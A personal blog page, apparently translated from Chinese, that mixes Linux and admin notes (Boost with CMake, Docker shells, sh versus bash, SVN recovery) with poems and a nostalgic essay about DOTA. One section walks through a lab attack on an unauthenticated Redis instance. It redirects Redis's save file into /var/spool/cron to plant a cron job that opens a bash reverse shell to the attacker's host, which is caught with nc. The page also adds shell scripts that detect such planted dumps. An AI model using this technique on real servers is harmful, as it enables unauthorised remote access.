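How I wish we could wake from this nightmare soon

At first, no one cared about this disaster.

It was just a wildfire, a drought,

the extinction of a species, the disappearance of a city.

Until this disaster touched every one of us.

from The Wandering Earth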

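Specify Boost Libraries with CMake3

The C++ Boost libraries installed by default on CentOS are too old, so some software that depends on them fails the configure step when built from source: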

Unable to find the Boost header files.  Please set BOOST_ROOT to the root   directory containing Boost or BOOST_INCLUDEDIR to the directory containing

Download the latest version from https://www.boost.org

wget https://dl.bintray.com/boostorg/release/1.72.0/source/boost_1_72_0.tar.gz
tar -xzf boost_1_72_0.tar.gz
cd boost_1_72_0
./bootstrap.sh --prefix=/opt/boost
./b2 install --prefix=/opt/boost --with=all

Specify the Boost install path when running cmake

cmake3 -DBOOST_ROOT=/opt/boost

from https://cmake.org/cmake/help/v3.0/module/FindBoost.html

‘SSH’ into Docker container

docker ps
docker container exec -it <container name or id> /bin/sh

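Note: the shell path at the end of the command (shown in red in the original post) depends on the Linux distribution the container uses. On most GNU/Linux systems sh is linked to bash, which you can see in the /bin directory.

If bash is present, the command above can also be written as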

docker container exec -it <container name or id> /bin/bash

If bash does not exist, the following error occurs

OCI runtime exec failed: exec failed: container_linux.go:345: starting container process caused "exec: \"/bin/bash\": stat /bin/bash: no such file or directory": unknown
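One way to avoid the error above is to ask the container which shell it has before opening the session. This is an added example, not part of the original post; the function names container_shell and enter_container are made up for illustration, and it assumes the image ships at least /bin/sh.

```shell
#!/bin/sh
# Added example: open the best available shell in a container.
# Assumption: the image has /bin/sh; images with no shell at all
# (scratch, distroless) make the probe return nothing.

# Print the shell to exec: bash if the container has it, otherwise sh.
container_shell() {
    # The probe itself runs through /bin/sh inside the container, so it
    # also works on Alpine/BusyBox images where /bin/bash is missing.
    docker container exec "$1" /bin/sh -c \
        'command -v bash || command -v sh' 2>/dev/null | head -n 1
}

# Interactive entry point; the container name or id is the only argument.
enter_container() {
    shell=$(container_shell "$1")
    if [ -z "$shell" ]; then
        echo "no shell found in container $1" >&2
        return 1
    fi
    docker container exec -it "$1" "$shell"
}
```

Call it as enter_container <container name or id>.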

What is sh

sh (or the Shell Command Language) is a programming language described by the POSIX standard. It has many implementations (ksh88, dash, …). bash can also be considered an implementation of sh (see below).

Because sh is a specification, not an implementation, /bin/sh is a symlink (or a hard link) to an actual implementation on most POSIX systems.

What is bash

bash started as an sh-compatible implementation (although it predates the POSIX standard by a few years), but as time passed it has acquired many extensions. Many of these extensions may change the behavior of valid POSIX shell scripts, so by itself bash is not a valid POSIX shell. Rather, it is a dialect of the POSIX shell language.

bash supports a --posix switch, which makes it more POSIX-compliant. It also tries to mimic POSIX if invoked as sh.

sh = bash?

For a long time, /bin/sh used to point to /bin/bash on most GNU/Linux systems. As a result, it had almost become safe to ignore the difference between the two. But that started to change recently.

Some popular examples of systems where /bin/sh does not point to /bin/bash (and on some of which /bin/bash may not even exist) are:

  1. Modern Debian and Ubuntu systems, which symlink sh to dash by default;
  2. Busybox, which is usually run during the Linux system boot time as part of initramfs. It uses the ash shell implementation.
  3. BSDs, and in general any non-Linux systems. OpenBSD uses pdksh, a descendant of the Korn shell. FreeBSD’s sh is a descendant of the original UNIX Bourne shell. Solaris has its own sh which for a long time was not POSIX-compliant; a free implementation is available from the Heirloom project.

How can you find out what /bin/sh points to on your system?

The complication is that /bin/sh could be a symbolic link or a hard link. If it’s a symbolic link, a portable way to resolve it is:

% file -h /bin/sh
/bin/sh: symbolic link to bash

If it’s a hard link, try

% find -L /bin -samefile /bin/sh
/bin/sh
/bin/bash

In fact, the -L flag covers both symlinks and hardlinks, but the disadvantage of this method is that it is not portable — POSIX does not require find to support the -samefile option, although both GNU find and FreeBSD find support it.

Shebang line

Ultimately, it’s up to you to decide which one to use, by writing the «shebang» line.

E.g.

#!/bin/sh

will use sh (and whatever that happens to point to),

#!/bin/bash

will use /bin/bash if it’s available (and fail with an error message if it’s not). Of course, you can also specify another implementation, e.g.

#!/bin/dash

Which one to use

For my own scripts, I prefer sh for the following reasons:

  • it is standardized
  • it is much simpler and easier to learn
  • it is portable across POSIX systems — even if they happen not to have bash, they are required to have sh

There are advantages to using bash as well. Its features make programming more convenient and similar to programming in other modern programming languages. These include things like scoped local variables and arrays. Plain sh is a very minimalistic programming language.

from https://stackoverflow.com/a/5725402

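Penetration via Redis

If Redis is bound to 0.0.0.0, requires no password, and has write permission on /var/spool/cron, the security of the host is very likely to be affected.

Tools: nmap, nc, redis-cli (a Kali environment is used here)

Target: 192.168.1.179

Attacking machine: 192.168.1.73

Scan the target with nmap. Because this is a test, the port range is already known; the Redis cluster ports are highlighted in red in the original output.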

nmap -p 7000-7010 -sT -O 192.168.1.179
Nmap scan report for 192.168.1.179
Host is up (0.00032s latency).
PORT     STATE  SERVICE
7000/tcp closed afs3-fileserver
7001/tcp open   afs3-callback
7002/tcp open   afs3-prserver
7003/tcp open   afs3-vlserver
7004/tcp open   afs3-kaserver
7005/tcp open   afs3-volser
7006/tcp open   afs3-errors
7007/tcp closed afs3-bos
7008/tcp closed afs3-update
7009/tcp closed afs3-rmtsys
7010/tcp closed ups-onlinet

Connect to Redis with the CLI in cluster mode

redis-cli -c -h 192.168.1.179 -p 7001

Switch the Redis working directory to the cron job directory

192.168.1.179:7001> CONFIG SET dir /var/spool/cron

Create a cron job file

192.168.1.179:7001> CONFIG SET dbfilename hack

Set a cron job that spawns a reverse shell, then run save to write it out and exit to quit

set payload "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.1.73/9999 0>&1\n\n"

Receive the interactive shell on the chosen port

nc -l -p 9999

Penetration complete
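The steps above leave a Redis RDB dump inside the cron directory, and that artifact is easy to look for on the defending side. The following is an added example, not part of the original post: the function names are made up for illustration, and it assumes head -c and grep -a are available (GNU, BSD and BusyBox all provide them).

```shell
#!/bin/sh
# Added example: detect Redis RDB dumps written into a cron spool directory.

# An RDB file starts with the ASCII magic "REDIS" followed by a 4-digit
# format version; a real crontab never starts that way.
is_rdb_dump() {
    [ "$(head -c 5 "$1" 2>/dev/null)" = "REDIS" ]
}

# Print each regular file (dotfiles included) in the directory that
# carries the RDB magic. Defaults to the directory used on this page.
scan_cron_spool() {
    dir=${1:-/var/spool/cron}
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -f "$f" ] || continue
        if is_rdb_dump "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print the lines inside a flagged file that cron would accept as jobs:
# five schedule fields followed by a command.
# Assumption: Redis stored the value uncompressed; an LZF-compressed
# value will not match.
embedded_cron_lines() {
    LC_ALL=C grep -aE '^([0-9*/,-]+[[:space:]]+){5}[^[:space:]]' "$1"
}
```

Run scan_cron_spool against each cron directory on the host, then embedded_cron_lines on every file it reports to see what was scheduled.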

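SVN Migration and Recovery

Restoring the SVN service after a server power failure and disk recovery

First, initialize a repository with the svnadmin command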

svnadmin create repos

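This repository is used for the import later

Then, on the recovered disk, find the original repository's current file and check the latest revision number; the path depends on where the repository used to live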

cat /mnt/usb/backup/sqn004\ lv_home/svn/repo/db/current
23082

Export the original repository with the dump command; this takes a long time if the repository is large

svnadmin dump /mnt/usb/backup/sqn004\ lv_home/svn/repo > /home/svnrepo.dump
* 已转存版本 0。
* 已转存版本 1。
* 已转存版本 2。
* 已转存版本 3。
      .
      .

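If the export fails along the way, note the revision at which it failed. In this case it failed at revision 22986 because of a storage space problem; after freeing space, dump again with extra parameters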

svnadmin dump /mnt/usb/backup/sqn004\ lv_home/svn/repo/ -r 22986:23082 --incremental >svnrepo2.dump

When that is done, load the dump files into the new repository

svnadmin load /home/svn/repo/ < svnrepo.dump
svnadmin load /home/svn/repo/ < svnrepo2.dump

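Desolate Wind

Waking from the great dream, a thousand years have passed; silk robes in disarray, the wind biting cold.

Look as I may, the old attire is nowhere to be found; real or illusion, like a dream, like smoke.

Seeing red as green, the heart bewildered; ask not of the life before, only cherish what fate has joined.

A soul with nowhere to return, held by love; clinging to the mortal world, not envying the immortals.

Early Autumn

This year is the third since a Chinese team last won the TI championship. The moment the Chinese team lost to its opponent and finished third, I felt as if I were back in junior high. Back then I came to the DOTA map through war3, absorbed in its fierce competition and its challenging, complex mechanics, and even more captivated by the fun of teaming up with my friends. A few of us would sit in a row, chattering about which heroes were strong and how to combine them; every win in our team matches brought us unmatched joy, and we naively believed we would play DOTA for a lifetime and be friends for a lifetime. Time passes, people gather and part; I may never see my childhood companions again, and even these precious memories slip away bit by bit. Perhaps that is the strange thing about time: it always rubs memories until they are mottled and then leaves you to patch them up with your own wishful thinking. It still marches on, firm and forceful, crushing any illusion that might stand in its way. Goodbye to this purple summer.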